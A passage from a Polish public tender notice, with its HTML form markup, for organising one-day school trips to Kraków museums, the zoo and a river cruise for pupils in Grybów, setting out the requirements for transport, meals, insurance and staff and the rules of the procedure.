3.5.2.2. spełniających wszystkie wymogi bezpieczeństwa i kodeksu drogowego, 3.5.2.3. prowadzonych przez osoby posiadające odpowiednie uprawnienia do świadczenia tychże usług. 3.5.3. Ubezpieczenie: NNW na czas przejazdu i pobytu od kosztów leczenia i następstw nieszczęśliwych wypadków na min. 10000,00 zł dla każdego uczestnika wyjazdu (tj. uczniowie i opiekunowie szkolni). 3.5.4. Wyżywienie: 3.5.4.1. Wyżywienie dla 16 uczniów i 1 opiekuna szkolnego 3.5.4.2. Wykonawca jest zobowiązany zagwarantować drugie śniadanie i obiad, przygotowany zgodnie z zasadami racjonalnego żywienia określonymi w obowiązujących przepisach prawa i odpowiadające normom pod względem: ilości, jakości i wartości odżywczych - drugie śniadanie powinno się składać z drożdżówki (masa min. 80g różne rodzaje np. z owocami, serem) oraz soku owocowego w butelce plastikowej o poj. min. 300 ml, obiad powinien składać się z ciepłego posiłku - porcja: ziemniaki lub frytki (o wadze min. 100 g), kotlet drobiowy lub schabowy (o wadze min. 100 g), zestaw min. 3 surówek, w tym: mizeria, marchewka, buraczki, kompot oraz owoc (jabłko, gruszka lub banan). 3.5.4.3. Żywienie uczestników powinno odbywać się zgodnie z zasadami higieny oraz racjonalnego żywienia określonymi w odrębnych przepisach. 3.5.4.4. Wykonawca zapewni obiad serwowany w restauracji. Każdy z uczestników będzie mieć zapewnione miejsce do posiłku (stolik i krzesło wraz z zastawą). Nie dopuszcza się podawania obiadu w naczyniach jednorazowych. 3.5.5. Kadra: 3.5.5.1. kierownik techniczno-organizacyjny wyjazdu - osoba, która posiada uprawnienia do pełnienia funkcji kierownika wycieczek szkolnych (odpowiedzialny za harmonogram wyjazdu, kontakty z przedstawicielami odwiedzanych instytucji miejsc, miejsca spożywania posiłków, inne sprawy techniczno-organizacyjne). 3.5.5.2. przewodnicy / osoby z uprawnieniami do oprowadzania po zwiedzanych instytucjach 3.5.5.3. jeden opiekun grupy, posiadający kwalifikacje zgodnie z przepisami MEN 3.5.6. Bilety wstępu do zwiedzanych miejsc dla uczniów i opiekunów szkolnych. W ramach zajęć wyjazdowych Wykonawca zapewnia bilety wstępu dla wszystkich uczestników zajęć wyjazdowych i zwiedzanie z przewodnikiem: 3.5.6.1. Muzeum Inżynierii Miejskiej. 3.5.6.2. Ogród Zoologiczny w Krakowie. 3.5.7. Program zajęć wyjazdowych: 3.5.7.1. Wykonawca zobowiązany jest do przedstawienia wraz z ofertą propozycji programu wyjazdu (konkretnej daty wyjazdu i szczegółowego harmonogramu zawierającego godziny poszczególnych elementów planu dnia), w tym minimum: a) wyjazd spod SP nr 1 w Grybowie, ul. Szkolna 1 b) przyjazd do Krakowa c) Muzeum Inżynierii Miejskiej - np. Spotkanie z Brombą o mierzeniu lub Spotkanie z Brombą o ważeniu, ewentualnie edukacyjna wystawa czasowa ,,to takie proste" lub inna w miarę dostępności miejsc d) Muzeum Inżynierii Miejskiej - wystawa ,,Galeria Figur Stalowych" e) zwiedzanie Ogrodu Zoologicznego w Krakowie f) II śniadanie g) obiad h) powrót do SP nr 1 w Grybowie, ul. Szkolna 1 3.6. Zajęcia wyjazdowe dla III, IV i V grupy koła matematycznego do Krakowa. 3.6.1. Założenia: 3.6.1.1. Liczba uczestników: max. 23 uczniów (tj. 3 grupy) z klas IV-VII SP 3.6.1.2. Liczba opiekunów szkolnych: 1 osoba 3.6.1.3. Termin wyjazdu: od podpisania umowy do 15 czerwca 2018 r. (dni: od poniedziałku do piątku) 3.6.1.4. Czas trwania: wyjazd jednodniowy 3.6.1.5. Miejsce wyjazdu: Szkoła Podstawowa nr 1 w Grybowie, ul. Szkolna 1 3.6.1.6. Miejsce powrotu: Szkoła Podstawowa nr 1 w Grybowie, ul. Szkolna 1 3.6.2. Transport. Wykonawca zapewni dojazd i przejazd z miejsca wyjazdu na miejsce pobytu, na trasie gwarantowanej wycieczki (zgodnie z jej programem) i powrót z pobytu z wykorzystaniem środków transportu (autokaru lub busa o podwyższonym standardzie wyposażonym w klimatyzację/ogrzewanie): 3.6.2.1. dopuszczonych do ruchu i odpowiadających wymaganiom ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz.U. z 2007 r. Nr 125, poz. 874 z późn. zm.) - posiadających aktualny przegląd i ubezpieczenie, 3.6.2.2. spełniających wszystkie wymogi bezpieczeństwa i kodeksu drogowego, 3.6.2.3. prowadzonych przez osoby posiadające odpowiednie uprawnienia do świadczenia tychże usług. 3.6.3. Ubezpieczenie: NNW na czas przejazdu i pobytu od kosztów leczenia i następstw nieszczęśliwych wypadków na min. 10000,00 zł dla każdego uczestnika wyjazdu (tj. uczniowie i opiekunowie szkolni). 3.6.4. Wyżywienie: 3.6.4.1. Wyżywienie dla 23 uczniów i 1 opiekuna szkolnego 3.6.4.2. Wykonawca jest zobowiązany zagwarantować drugie śniadanie i obiad, przygotowany zgodnie z zasadami racjonalnego żywienia określonymi w obowiązujących przepisach prawa i odpowiadające normom pod względem: ilości, jakości i wartości odżywczych - drugie śniadanie powinno się składać z drożdżówki (masa min. 80g różne rodzaje np. z owocami, serem) oraz soku owocowego w butelce plastikowej o poj. min. 300 ml, obiad powinien składać się z ciepłego posiłku - porcja: ziemniaki lub frytki (o wadze min. 100 g), kotlet drobiowy lub schabowy (o wadze min. 100 g), zestaw min. 3 surówek, w tym: mizeria, marchewka, buraczki, kompot oraz owoc (jabłko, gruszka lub banan). 3.6.4.3. Żywienie uczestników powinno odbywać się zgodnie z zasadami higieny oraz racjonalnego żywienia określonymi w odrębnych przepisach. 3.6.4.4. Wykonawca zapewni obiad serwowany w restauracji. Każdy z uczestników będzie mieć zapewnione miejsce do posiłku (stolik i krzesło wraz z zastawą). Nie dopuszcza się podawania obiadu w naczyniach jednorazowych. 3.6.5. Kadra: 3.6.5.1. kierownik techniczno-organizacyjny wyjazdu - osoba, która posiada uprawnienia do pełnienia funkcji kierownika wycieczek szkolnych (odpowiedzialny za harmonogram wyjazdu, kontakty z przedstawicielami odwiedzanych instytucji, miejsca spożywania posiłków, zakwaterowanie i inne sprawy techniczno-organizacyjne). 3.6.5.2. przewodnicy / osoby z uprawnieniami do oprowadzania po zwiedzanych instytucjach 3.6.5.3. dwóch opiekunów grupy, posiadających kwalifikacje zgodnie z przepisami MEN 3.6.6. Bilety wstępu do zwiedzanych miejsc dla uczniów i opiekunów szkolnych. W ramach zajęć wyjazdowych Wykonawca zapewnia bilety wstępu dla wszystkich uczestników zajęć wyjazdowych i zwiedzanie z przewodnikiem: 3.6.6.1. Ogród Doświadczeń im. Stanisława Lema 3.6.6.2. Muzeum Sztuki i Techniki Japońskiej Manggha 3.6.6.3. Rejs statkiem po Wiśle. 3.6.7. Program zajęć wyjazdowych: 3.6.7.1. Wykonawca zobowiązany jest do przedstawienia wraz z ofertą propozycji programu wyjazdu (konkretnej daty wyjazdu i szczegółowego harmonogramu zawierającego godziny poszczególnych elementów planu dnia), w tym minimum: a) wyjazd spod SP nr 1 w Grybowie, ul. Szkolna 1 b) przyjazd do Krakowa c) Ogród Doświadczeń im. Stanisława Lema - zwiedzanie oraz udział w warsztatach d) Muzeum Sztuki i Techniki Japońskiej Manggha - udział w programie ,,Japonia wczoraj i dziś", oglądanie wystaw e) ok. 1-godzinny rejs statkiem po Wiśle f) II śniadanie g) obiad h) powrót do SP nr 1 w Grybowie, ul. Szkolna 1 3.7. Zajęcia wyjazdowe dla grup I - VI zajęć dydaktyczno - wyrównawczych do Krakowa. 3.7.1. Założenia: 3.7.1.1. Liczba uczestników: max. 29 uczniów (tj. 6 grup) z klas I-VII SP 3.7.1.2. Liczba opiekunów szkolnych: 1 osoba 3.7.1.3. Termin wyjazdu: od podpisania umowy do 15 czerwca 2018 r. (dni: od poniedziałku do piątku) 3.7.1.4. Czas trwania: wyjazd jednodniowy 3.7.1.5. Miejsce wyjazdu: Szkoła Podstawowa nr 1 w Grybowie, ul. Szkolna 1 3.7.1.6. Miejsce powrotu: Szkoła Podstawowa nr 1 w Grybowie, ul. Szkolna 1 3.7.2. Transport. Wykonawca zapewni dojazd i przejazd z miejsca wyjazdu na miejsce pobytu, na trasie gwarantowanej wycieczki (zgodnie z jej programem) i powrót z pobytu z wykorzystaniem środków transportu (autokaru lub busa o podwyższonym standardzie wyposażonym w klimatyzację/ogrzewanie): 3.7.2.1. dopuszczonych do ruchu i odpowiadających wymaganiom ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz.U. z 2007 r. Nr 125, poz. 874 z późn. zm.) - posiadających aktualny przegląd i ubezpieczenie, 3.7.2.2. spełniających wszystkie wymogi bezpieczeństwa i kodeksu drogowego, 3.7.2.3. prowadzonych przez osoby posiadające odpowiednie uprawnienia do świadczenia tychże usług. 3.7.3. Ubezpieczenie: NNW na czas przejazdu i pobytu od kosztów leczenia i następstw nieszczęśliwych wypadków na min. 10000,00 zł dla każdego uczestnika wyjazdu (tj. uczniowie i opiekunowie szkolni). 3.7.4. Wyżywienie: 3.7.4.1. Wyżywienie dla 29 uczniów i 1 opiekuna szkolnego 3.7.4.2. Wykonawca jest zobowiązany zagwarantować drugie śniadanie i obiad, przygotowany zgodnie z zasadami racjonalnego żywienia określonymi w obowiązujących przepisach prawa i odpowiadające normom pod względem: ilości, jakości i wartości odżywczych - drugie śniadanie powinno się składać z drożdżówki (masa min. 80g różne rodzaje np. z owocami, serem) oraz soku owocowego w butelce plastikowej o poj. min. 300 ml, obiad powinien składać się z ciepłego posiłku - porcja: ziemniaki lub frytki (o wadze min. 100 g), kotlet drobiowy lub schabowy (o wadze min. 100 g), zestaw min. 3 surówek, w tym: mizeria, marchewka, buraczki, kompot oraz owoc (jabłko, gruszka lub banan). 3.7.4.3. Żywienie uczestników powinno odbywać się zgodnie z zasadami higieny oraz racjonalnego żywienia określonymi w odrębnych przepisach. 3.7.4.4. Wykonawca zapewni obiad serwowany w restauracji. Każdy z uczestników będzie mieć zapewnione miejsce do posiłku (stolik i krzesło wraz z zastawą). Nie dopuszcza się podawania obiadu w naczyniach jednorazowych. 3.7.5. Kadra: 3.7.5.1. kierownik techniczno-organizacyjny wyjazdu - osoba, która posiada uprawnienia do pełnienia funkcji kierownika wycieczek szkolnych (odpowiedzialny za harmonogram wyjazdu, kontakty z przedstawicielami odwiedzanych instytucji, miejsca spożywania posiłków i inne sprawy techniczno-organizacyjne). 3.7.5.2. przewodnicy / osoby z uprawnieniami do oprowadzania po zwiedzanych instytucjach 3.7.5.3. dwóch opiekunów grupy, posiadających kwalifikacje zgodnie z przepisami MEN 3.7.6. Bilety wstępu do zwiedzanych miejsc dla uczniów i opiekunów szkolnych. W ramach zajęć wyjazdowych Wykonawca zapewnia bilety wstępu dla wszystkich uczestników zajęć wyjazdowych i zwiedzanie z przewodnikiem: 3.7.6.1. Ogród Doświadczeń im. Stanisława Lema. 3.7.6.2. Muzeum Sztuki i Techniki Japońskiej Manggha. 3.7.6.3. Rejs statkiem po Wiśle. 3.7.7. Program zajęć wyjazdowych: 3.7.7.1. Wykonawca zobowiązany jest do przedstawienia wraz z ofertą propozycji programu wyjazdu (konkretnej daty wyjazdu i szczegółowego harmonogramu zawierającego godziny poszczególnych elementów planu dnia), w tym minimum: a) wyjazd spod SP nr 1 w Grybowie, ul. Szkolna 1 b) przyjazd do Krakowa c) Ogród Doświadczeń im. Stanisława Lema - zwiedzanie oraz udział w warsztatach d) Muzeum Sztuki i Techniki Japońskiej Manggha - udział w programie ,,Japonia wczoraj i dziś", oglądanie wystaw e) ok. 1-godzinny rejs statkiem po Wiśle f) II śniadanie g) obiad h) powrót do SP nr 1 w Grybowie, ul. Szkolna 1 3.8. Wyjazdy opisane w pkt 3.2.1. i 3.2.2. nie mogą się odbywać w tym samym terminie co wyjazdy z pkt 3.2.3. - 3.2.5 z uwagi na powtarzające się osoby w grupach. Ostateczne terminy wyjazdów muszą być zaakceptowane przez Zamawiającego. 3.9. Wykonawca zobowiązany będzie do przedstawienia wraz z ofertą szczegółowej propozycji planu zajęć wyjazdowych, o których mowa w pkt. 3.2. niniejszej specyfikacji. Propozycja ta powinna zawierać minimum program zajęć wyjazdowych, o których mowa w pkt. 3.3.7., 3.4.7., 3.5.7., 3.6.7. 3.7.7. wraz z podaniem daty i orientacyjnych godzin. 3.10. Wykonawca ponosi pełną odpowiedzialność za wszelkie szkody na osobie i mieniu zaistniałe podczas zajęć wyjazdowych. 3.11. Wykonawca zobowiązany jest do spełnienia, przy realizacji usługi, warunków określonych w Rozporządzeniu Ministra Edukacji Narodowej i Sportu z dnia 8 listopada 2001 r. w sprawie warunków i sposobu organizowania przez publiczne przedszkola, szkoły i placówki krajoznawstwa i turystyki (Dz. U. Nr 135, poz. 1516 z późn. zm.) oraz w Rozporządzeniu Ministra Edukacji Narodowej z dnia 30 marca 2016 r. w sprawie wypoczynku dzieci i młodzieży. (Dz. U. poz. 452). 3.12. Zamawiający informuje, że Wykonawca zobowiązany będzie do podstawienia środka transportu na 40 minut wcześniej przed planowanym wyjazdem celem sprawdzenia go przez uprawnione do tego służby. 3.13. W przypadku wystąpienia awarii środka transportu lub w sytuacji niedopuszczenia go do ruchu przez uprawnione do tego służby, Wykonawca zapewnieni na własny koszt zastępczy środek transportu, spełniający wymagania określone w niniejszej specyfikacji oraz w umowie w taki sposób, aby nie powodować spóźnień czasowych (max. 2 godz.). Zamawiający nie będzie ponosił z tego tytułu żadnych dodatkowych kosztów. 3.14. W przypadku, gdy Wykonawca nie zapewni zastępczego środka transportu oraz kierowcy w sytuacji opisanej w pkt. 3.13. niniejszej specyfikacji, Zamawiający zleci osobie trzeciej wykonanie usługi zastępczej, za którą wszelkie koszty poniesie Wykonawca. 3.15. Ponadto Wykonawca zobowiązany jest zapewnić dla każdego wyjazdu: 3.15.1. Wyposażenie apteczki w czasie podróży i pobytu w placówkach, łazienki i wydzielonego WC. 3.15.2. Przeprowadzenie procesu informacyjnego w dniu wyjazdu dotyczącego organizacji pobytu na miejscu na rzecz uczestników, oznaczenie miejsc, czasu i terminów zbiórek oraz koniecznych adresów i telefonów. 3.16. Zamawiający dopuszcza możliwość zmian w harmonogramie (wzór stanowi załącznik nr 9 do niniejszej specyfikacji) i programie zajęć wyjazdowych (wzór stanowi załącznik nr 10 do niniejszej specyfikacji) w zakresie zwiedzanych miejsc, po uprzednim uzyskaniu akceptacji przez Zamawiającego. 3.17. Zamawiający dopuszcza możliwość zmiany terminu wykonania zamówienia. 3.18. Jako rozliczenie z odbytych zajęć wyjazdowych Wykonawca dostarczy do trzech dni roboczych od dnia zakończenia zajęć wyjazdowych: 3.18.1. Listę obecności (wzór przekazany przez Zamawiającego). 3.18.2. Dokumentację fotograficzną - min 30 zdjęć z każdych zajęć wyjazdowych w formie elektronicznej na nośniku CD. 3.19. Wspólny słownik zamówień (CPV): 3.19.1. 63511000 - 4 Organizacja wycieczek. 3.19.2. 63500000 - 4 Usługi biur podróży, podmiotów turystycznych i pomocy turystycznej. 3.20. Zamawiający na podstawie art. 29 ust. 3a ustawy wymaga zatrudnienia przez Wykonawcę na podstawie umowy o pracę osób wykonujących czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 1 ustawy z dnia 26 czerwca 1974 r. Kodeks pracy (t.j. Dz. U. z 2016 r. poz. 1666 z późn. zm.). 3.21. Zamawiający ustala także: gdziekolwiek w Specyfikacji Istotnych Warunków Zamówienia oraz w załącznikach do Specyfikacji pojawia się znak towarowy, patent lub pochodzenie Zamawiający dopuszcza stosowanie rozwiązań równoważnych. Znaki towarowe, patenty lub pochodzenie powinny być uwzględniane jako definicje standardu a nie jako określone marki zastosowane w projekcie.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">63511000-4</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>63500000-4</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2018-06-15</span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2018-06-15</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać. Ocenę spełniania warunku udziału w postępowaniu Zamawiający przeprowadzi na podstawie oświadczenia załączonego do oferty.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać. Ocenę spełniania warunku udziału w postępowaniu Zamawiający przeprowadzi na podstawie oświadczenia załączonego do oferty.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać. Ocenę spełniania warunku udziału w postępowaniu Zamawiający przeprowadzi na podstawie oświadczenia załączonego do oferty.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Ocenę spełniania warunku udziału w postępowaniu Zamawiający przeprowadzi na podstawie oświadczenia załączonego do oferty.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Ocenę spełniania warunku udziału w postępowaniu Zamawiający przeprowadzi na podstawie oświadczenia załączonego do oferty.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">Ocenę spełniania warunku udziału w postępowaniu Zamawiający przeprowadzi na podstawie oświadczenia załączonego do oferty.</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Formularz ofertowy, potwierdzenie wniesienia wadium.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Każdy Wykonawca zobowiązany jest zabezpieczyć swoją ofertę wadium w wysokości: 1 000,00 zł (tysiąc złotych zero groszy).</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span 